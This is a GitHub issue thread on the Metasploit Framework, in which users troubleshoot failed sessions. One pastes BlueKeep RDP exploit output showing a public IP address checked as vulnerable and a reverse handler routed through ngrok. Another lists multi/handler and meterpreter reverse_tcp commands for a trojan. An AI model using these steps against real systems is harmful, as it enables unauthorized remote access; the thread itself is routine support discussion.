rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.79k stars 13.9k forks source link

Blue keep Exploit completed, but no session was created. #15646

Closed A91K3C1l closed 2 years ago

A91K3C1l commented 3 years ago

I want to ask why the session was not created even though the exploit was successful and the target vuln was the following output

*] Started reverse TCP handler on 0.0.0.0:12900           [*] target:3389 - Running automatic check ("set AutoCheck false" to disable)                                   [*] 122.248.32.54:3389 - Using auxiliary/scanner/rdp/cve_2019_0708_bluekeep as check                                  [+] target:3389    - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.                                                     [*] target:3389    - Scanned 1 of 1 hosts (100% complete)                                                      [+] target:3389 - The target is vulnerable. The target attempted cleanup of the incorrectly-bound MS_T120 channel.                                                        [*] target:3389 - Using CHUNK grooming strategy. Size 50MB, target address 0xfffffa8006a00000, Channel count 1.[!] target:3389 - <---------------- | Entering Danger Zone | ---------------->                                 [*] target:3389 - Surfing channels ...              [*] target:3389 - Lobbing eggs ...                  [*] target:3389 - Forcing the USE of FREE'd object ...                                                         [!] target:3389 - <---------------- | Leaving Danger Zone | ---------------->                                  [*] Exploit completed, but no session was created.

I run ngrok tcp 1337 and I enter the host and port I got from ngrok to metasploit lhost and lport Why?? IMG_20210906_150655

h00die commented 3 years ago

Could be many things, most likely a networking issue is my guess

github-actions[bot] commented 2 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

dodoaska commented 2 years ago

@A91K3C1l Can you paste all metasploit you usage . Thank you

github-actions[bot] commented 2 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 2 years ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

bingo1199 commented 1 year ago

i am trying to hack my virtual window in the same network

for the trojan lhost=10.0.2.6 lport=2525

msfconsole =use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp set lhost=10.0.2.6 lport=2525 set target=0

after downloading the trojan in virtual window exploit , exploit -j -z , run

exploit completed but no session was created.. what can i do